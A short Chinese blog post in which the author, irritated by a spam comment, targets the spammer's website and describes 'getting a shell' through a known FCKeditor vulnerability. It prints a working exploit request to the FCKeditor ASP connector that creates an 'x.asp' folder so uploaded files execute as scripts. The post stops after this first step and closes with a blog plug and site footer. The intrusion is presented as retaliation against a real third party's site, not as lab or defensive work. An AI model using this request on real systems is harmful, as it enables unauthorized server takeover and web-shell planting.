今天看博客里的评论多出来个燕落留声的什么加个网站链接,
因为评论的版块被我改动过, 所以删除还是比较麻烦的。。
我就去他的站看了下。
加了个/admin,知道 源码信息 ,百度下 有漏洞fckeditor的 (子仪最先发布的但是根据他步骤貌似不对,建立不了文件夹,估计人品差吧)
我进了他的群,准备问下,因为他的百度空间图片什么都不显示后来直接找不到他空间了,貌似被和谐了吧,也许是我找错了。。。
直接撞击下源码看了。。
以下是拿shell过程
1 建x.asp文件夹
http://localhost:83/admin/FCKeditor/editor/filemanager/connectors/asp/
connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=
%2Fx.asp&NewFolderName=z&uuid=1244789975684
这个是他的目录 \uploadfile\image\x.asp\z 程序自动生成个 z 文件夹 不管它
欢迎大家来我的博客逛逛http://www.xiaoweio.cn/
京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有